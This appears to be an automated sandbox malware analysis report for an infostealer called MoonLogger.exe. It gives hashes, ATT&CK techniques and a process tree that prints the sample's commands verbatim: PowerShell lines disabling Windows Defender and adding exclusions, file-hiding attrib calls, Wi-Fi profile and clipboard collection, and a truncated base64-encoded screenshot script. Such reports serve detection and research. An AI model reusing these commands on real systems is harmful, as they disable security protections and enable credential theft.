a00a4bc63683e9eb6f0e52f7e12b9120fa97baa88a3ac1398d0e70c199790777

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14-12-2024 22:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MoonLogger.exe
Size

6.0MB
MD5

627d89185fa96cabec0dacc7bcd55264
SHA1

0ac231d45a5f33de1c7b0f01f073fb42e43aa7d1
SHA256

a00a4bc63683e9eb6f0e52f7e12b9120fa97baa88a3ac1398d0e70c199790777
SHA512

258536d6f48746e424613b84d33094e879487dc1613810c3bce0fd5d21ec33116353b26797559ee4acf05337e59bdee4faf5707b11af33728fb52c6495185dff
SSDEEP

98304:hXEtdFBmamaHl3Ne4i3gmtfXJOLhx9fZAzDJ4wzDgsRuGKCRTkdOcwcxsXQrmhEi:hmFFeN/FJMIDJf/gsAGKCRTJ9cxZK

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4924	powershell.exe
5020	powershell.exe
1268	powershell.exe
2080	powershell.exe
1608	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	MoonLogger.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2748	cmd.exe
4872	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3432	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe
468	MoonLogger.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com
25	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
392	tasklist.exe
2200	tasklist.exe
3808	tasklist.exe
4392	tasklist.exe
1264	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2876	cmd.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b81-22.dat	upx
behavioral2/memory/468-26-0x00007FFF57120000-0x00007FFF5758E000-memory.dmp	upx
behavioral2/files/0x000a000000023b85-28.dat	upx
behavioral2/memory/468-31-0x00007FFF5D260000-0x00007FFF5D270000-memory.dmp	upx
behavioral2/files/0x000a000000023b76-30.dat	upx
behavioral2/files/0x000a000000023b7f-33.dat	upx
behavioral2/memory/468-34-0x00007FFF5B880000-0x00007FFF5B8A4000-memory.dmp	upx
behavioral2/memory/468-37-0x00007FFF5D250000-0x00007FFF5D25F000-memory.dmp	upx
behavioral2/files/0x000a000000023b7c-49.dat	upx
behavioral2/memory/468-51-0x00007FFF5B7B0000-0x00007FFF5B7CF000-memory.dmp	upx
behavioral2/memory/468-47-0x00007FFF5B830000-0x00007FFF5B849000-memory.dmp	upx
behavioral2/files/0x0031000000023b75-46.dat	upx
behavioral2/memory/468-44-0x00007FFF5B850000-0x00007FFF5B87D000-memory.dmp	upx
behavioral2/files/0x000a000000023b84-50.dat	upx
behavioral2/files/0x000a000000023b79-43.dat	upx
behavioral2/memory/468-53-0x00007FFF56FA0000-0x00007FFF57111000-memory.dmp	upx
behavioral2/files/0x000a000000023b7b-54.dat	upx
behavioral2/memory/468-57-0x00007FFF5B790000-0x00007FFF5B7A9000-memory.dmp	upx
behavioral2/files/0x000a000000023b83-58.dat	upx
behavioral2/memory/468-59-0x00007FFF5BA30000-0x00007FFF5BA3D000-memory.dmp	upx
behavioral2/files/0x000a000000023b7d-60.dat	upx
behavioral2/memory/468-64-0x00007FFF5B720000-0x00007FFF5B74E000-memory.dmp	upx
behavioral2/memory/468-63-0x00007FFF57120000-0x00007FFF5758E000-memory.dmp	upx
behavioral2/files/0x000a000000023b80-65.dat	upx
behavioral2/files/0x000a000000023b7e-66.dat	upx
behavioral2/memory/468-70-0x00007FFF5B880000-0x00007FFF5B8A4000-memory.dmp	upx
behavioral2/memory/468-69-0x00007FFF57FE0000-0x00007FFF58098000-memory.dmp	upx
behavioral2/memory/468-68-0x00007FFF48AA0000-0x00007FFF48E15000-memory.dmp	upx
behavioral2/files/0x000a000000023b78-71.dat	upx
behavioral2/memory/468-73-0x00007FFF57F90000-0x00007FFF57FA4000-memory.dmp	upx
behavioral2/files/0x000a000000023b7a-74.dat	upx
behavioral2/memory/468-76-0x00007FFF58810000-0x00007FFF5881D000-memory.dmp	upx
behavioral2/files/0x000a000000023b86-78.dat	upx
behavioral2/memory/468-79-0x00007FFF48790000-0x00007FFF488A8000-memory.dmp	upx
behavioral2/memory/468-105-0x00007FFF5B7B0000-0x00007FFF5B7CF000-memory.dmp	upx
behavioral2/memory/468-118-0x00007FFF56FA0000-0x00007FFF57111000-memory.dmp	upx
behavioral2/memory/468-203-0x00007FFF5B790000-0x00007FFF5B7A9000-memory.dmp	upx
behavioral2/memory/468-260-0x00007FFF5B720000-0x00007FFF5B74E000-memory.dmp	upx
behavioral2/memory/468-271-0x00007FFF57FE0000-0x00007FFF58098000-memory.dmp	upx
behavioral2/memory/468-269-0x00007FFF48AA0000-0x00007FFF48E15000-memory.dmp	upx
behavioral2/memory/468-308-0x00007FFF56FA0000-0x00007FFF57111000-memory.dmp	upx
behavioral2/memory/468-316-0x00007FFF48790000-0x00007FFF488A8000-memory.dmp	upx
behavioral2/memory/468-301-0x00007FFF57120000-0x00007FFF5758E000-memory.dmp	upx
behavioral2/memory/468-307-0x00007FFF5B7B0000-0x00007FFF5B7CF000-memory.dmp	upx
behavioral2/memory/468-303-0x00007FFF5B880000-0x00007FFF5B8A4000-memory.dmp	upx
behavioral2/memory/468-329-0x00007FFF57FE0000-0x00007FFF58098000-memory.dmp	upx
behavioral2/memory/468-343-0x00007FFF5B720000-0x00007FFF5B74E000-memory.dmp	upx
behavioral2/memory/468-342-0x00007FFF5BA30000-0x00007FFF5BA3D000-memory.dmp	upx
behavioral2/memory/468-341-0x00007FFF5B790000-0x00007FFF5B7A9000-memory.dmp	upx
behavioral2/memory/468-340-0x00007FFF56FA0000-0x00007FFF57111000-memory.dmp	upx
behavioral2/memory/468-339-0x00007FFF5B7B0000-0x00007FFF5B7CF000-memory.dmp	upx
behavioral2/memory/468-338-0x00007FFF5B830000-0x00007FFF5B849000-memory.dmp	upx
behavioral2/memory/468-337-0x00007FFF5B850000-0x00007FFF5B87D000-memory.dmp	upx
behavioral2/memory/468-336-0x00007FFF5D250000-0x00007FFF5D25F000-memory.dmp	upx
behavioral2/memory/468-335-0x00007FFF5B880000-0x00007FFF5B8A4000-memory.dmp	upx
behavioral2/memory/468-334-0x00007FFF5D260000-0x00007FFF5D270000-memory.dmp	upx
behavioral2/memory/468-332-0x00007FFF48790000-0x00007FFF488A8000-memory.dmp	upx
behavioral2/memory/468-331-0x00007FFF58810000-0x00007FFF5881D000-memory.dmp	upx
behavioral2/memory/468-330-0x00007FFF57F90000-0x00007FFF57FA4000-memory.dmp	upx
behavioral2/memory/468-328-0x00007FFF48AA0000-0x00007FFF48E15000-memory.dmp	upx
behavioral2/memory/468-333-0x00007FFF57120000-0x00007FFF5758E000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2360	cmd.exe
5020	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4968	cmd.exe
4200	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3584	WMIC.exe
5044	WMIC.exe
3048	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4216	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5020	PING.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
2080	powershell.exe
4924	powershell.exe
2080	powershell.exe
4924	powershell.exe
1608	powershell.exe
1608	powershell.exe
4872	powershell.exe
4872	powershell.exe
4872	powershell.exe
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
5020	powershell.exe
5020	powershell.exe
2316	powershell.exe
2316	powershell.exe
1268	powershell.exe
1268	powershell.exe
2028	powershell.exe
2028	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2200	tasklist.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeIncreaseQuotaPrivilege	3364	WMIC.exe
Token: SeSecurityPrivilege	3364	WMIC.exe
Token: SeTakeOwnershipPrivilege	3364	WMIC.exe
Token: SeLoadDriverPrivilege	3364	WMIC.exe
Token: SeSystemProfilePrivilege	3364	WMIC.exe
Token: SeSystemtimePrivilege	3364	WMIC.exe
Token: SeProfSingleProcessPrivilege	3364	WMIC.exe
Token: SeIncBasePriorityPrivilege	3364	WMIC.exe
Token: SeCreatePagefilePrivilege	3364	WMIC.exe
Token: SeBackupPrivilege	3364	WMIC.exe
Token: SeRestorePrivilege	3364	WMIC.exe
Token: SeShutdownPrivilege	3364	WMIC.exe
Token: SeDebugPrivilege	3364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3364	WMIC.exe
Token: SeRemoteShutdownPrivilege	3364	WMIC.exe
Token: SeUndockPrivilege	3364	WMIC.exe
Token: SeManageVolumePrivilege	3364	WMIC.exe
Token: 33	3364	WMIC.exe
Token: 34	3364	WMIC.exe
Token: 35	3364	WMIC.exe
Token: 36	3364	WMIC.exe
Token: SeDebugPrivilege	4924	powershell.exe
Token: SeIncreaseQuotaPrivilege	3364	WMIC.exe
Token: SeSecurityPrivilege	3364	WMIC.exe
Token: SeTakeOwnershipPrivilege	3364	WMIC.exe
Token: SeLoadDriverPrivilege	3364	WMIC.exe
Token: SeSystemProfilePrivilege	3364	WMIC.exe
Token: SeSystemtimePrivilege	3364	WMIC.exe
Token: SeProfSingleProcessPrivilege	3364	WMIC.exe
Token: SeIncBasePriorityPrivilege	3364	WMIC.exe
Token: SeCreatePagefilePrivilege	3364	WMIC.exe
Token: SeBackupPrivilege	3364	WMIC.exe
Token: SeRestorePrivilege	3364	WMIC.exe
Token: SeShutdownPrivilege	3364	WMIC.exe
Token: SeDebugPrivilege	3364	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3364	WMIC.exe
Token: SeRemoteShutdownPrivilege	3364	WMIC.exe
Token: SeUndockPrivilege	3364	WMIC.exe
Token: SeManageVolumePrivilege	3364	WMIC.exe
Token: 33	3364	WMIC.exe
Token: 34	3364	WMIC.exe
Token: 35	3364	WMIC.exe
Token: 36	3364	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3048	WMIC.exe
Token: SeSecurityPrivilege	3048	WMIC.exe
Token: SeTakeOwnershipPrivilege	3048	WMIC.exe
Token: SeLoadDriverPrivilege	3048	WMIC.exe
Token: SeSystemProfilePrivilege	3048	WMIC.exe
Token: SeSystemtimePrivilege	3048	WMIC.exe
Token: SeProfSingleProcessPrivilege	3048	WMIC.exe
Token: SeIncBasePriorityPrivilege	3048	WMIC.exe
Token: SeCreatePagefilePrivilege	3048	WMIC.exe
Token: SeBackupPrivilege	3048	WMIC.exe
Token: SeRestorePrivilege	3048	WMIC.exe
Token: SeShutdownPrivilege	3048	WMIC.exe
Token: SeDebugPrivilege	3048	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3048	WMIC.exe
Token: SeRemoteShutdownPrivilege	3048	WMIC.exe
Token: SeUndockPrivilege	3048	WMIC.exe
Token: SeManageVolumePrivilege	3048	WMIC.exe
Token: 33	3048	WMIC.exe
Token: 34	3048	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1448 wrote to memory of 468	1448	MoonLogger.exe	83
PID 1448 wrote to memory of 468	1448	MoonLogger.exe	83
PID 468 wrote to memory of 428	468	MoonLogger.exe	84
PID 468 wrote to memory of 428	468	MoonLogger.exe	84
PID 468 wrote to memory of 2404	468	MoonLogger.exe	85
PID 468 wrote to memory of 2404	468	MoonLogger.exe	85
PID 468 wrote to memory of 3756	468	MoonLogger.exe	87
PID 468 wrote to memory of 3756	468	MoonLogger.exe	87
PID 468 wrote to memory of 1964	468	MoonLogger.exe	90
PID 468 wrote to memory of 1964	468	MoonLogger.exe	90
PID 1964 wrote to memory of 2200	1964	cmd.exe	91
PID 1964 wrote to memory of 2200	1964	cmd.exe	91
PID 3756 wrote to memory of 5080	3756	cmd.exe	92
PID 3756 wrote to memory of 5080	3756	cmd.exe	92
PID 2404 wrote to memory of 4924	2404	cmd.exe	93
PID 2404 wrote to memory of 4924	2404	cmd.exe	93
PID 428 wrote to memory of 2080	428	cmd.exe	95
PID 428 wrote to memory of 2080	428	cmd.exe	95
PID 468 wrote to memory of 1780	468	MoonLogger.exe	94
PID 468 wrote to memory of 1780	468	MoonLogger.exe	94
PID 1780 wrote to memory of 3364	1780	cmd.exe	96
PID 1780 wrote to memory of 3364	1780	cmd.exe	96
PID 468 wrote to memory of 5024	468	MoonLogger.exe	98
PID 468 wrote to memory of 5024	468	MoonLogger.exe	98
PID 5024 wrote to memory of 3576	5024	cmd.exe	99
PID 5024 wrote to memory of 3576	5024	cmd.exe	99
PID 468 wrote to memory of 744	468	MoonLogger.exe	100
PID 468 wrote to memory of 744	468	MoonLogger.exe	100
PID 744 wrote to memory of 1824	744	cmd.exe	101
PID 744 wrote to memory of 1824	744	cmd.exe	101
PID 468 wrote to memory of 2840	468	MoonLogger.exe	102
PID 468 wrote to memory of 2840	468	MoonLogger.exe	102
PID 2840 wrote to memory of 3048	2840	cmd.exe	103
PID 2840 wrote to memory of 3048	2840	cmd.exe	103
PID 468 wrote to memory of 1580	468	MoonLogger.exe	104
PID 468 wrote to memory of 1580	468	MoonLogger.exe	104
PID 1580 wrote to memory of 3584	1580	cmd.exe	105
PID 1580 wrote to memory of 3584	1580	cmd.exe	105
PID 468 wrote to memory of 2876	468	MoonLogger.exe	106
PID 468 wrote to memory of 2876	468	MoonLogger.exe	106
PID 468 wrote to memory of 3840	468	MoonLogger.exe	108
PID 468 wrote to memory of 3840	468	MoonLogger.exe	108
PID 2876 wrote to memory of 3652	2876	cmd.exe	146
PID 2876 wrote to memory of 3652	2876	cmd.exe	146
PID 3840 wrote to memory of 1608	3840	cmd.exe	111
PID 3840 wrote to memory of 1608	3840	cmd.exe	111
PID 468 wrote to memory of 1508	468	MoonLogger.exe	112
PID 468 wrote to memory of 1508	468	MoonLogger.exe	112
PID 468 wrote to memory of 4856	468	MoonLogger.exe	113
PID 468 wrote to memory of 4856	468	MoonLogger.exe	113
PID 4856 wrote to memory of 3808	4856	cmd.exe	114
PID 4856 wrote to memory of 3808	4856	cmd.exe	114
PID 1508 wrote to memory of 4392	1508	cmd.exe	115
PID 1508 wrote to memory of 4392	1508	cmd.exe	115
PID 468 wrote to memory of 4244	468	MoonLogger.exe	116
PID 468 wrote to memory of 4244	468	MoonLogger.exe	116
PID 4244 wrote to memory of 4116	4244	cmd.exe	119
PID 4244 wrote to memory of 4116	4244	cmd.exe	119
PID 468 wrote to memory of 2748	468	MoonLogger.exe	117
PID 468 wrote to memory of 2748	468	MoonLogger.exe	117
PID 468 wrote to memory of 4736	468	MoonLogger.exe	118
PID 468 wrote to memory of 4736	468	MoonLogger.exe	118
PID 468 wrote to memory of 4604	468	MoonLogger.exe	120
PID 468 wrote to memory of 4604	468	MoonLogger.exe	120

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3652	attrib.exe
1700	attrib.exe
4908	attrib.exe

C:\Users\Admin\AppData\Local\Temp\MoonLogger.exe
"C:\Users\Admin\AppData\Local\Temp\MoonLogger.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Users\Admin\AppData\Local\Temp\MoonLogger.exe
  "C:\Users\Admin\AppData\Local\Temp\MoonLogger.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonLogger.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:428
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\MoonLogger.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2404
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ilysm', 0, 'ty:)', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3756
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ilysm', 0, 'ty:)', 48+16);close()"
      4⤵
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1964
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3364
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5024
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3576
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:744
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2840
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\MoonLogger.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\MoonLogger.exe"
      4⤵
      Views/modifies file attributes
      PID:3652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1508
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4856
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4244
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:4116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2748
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4736
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4604
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:4968
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3620
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:4368
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC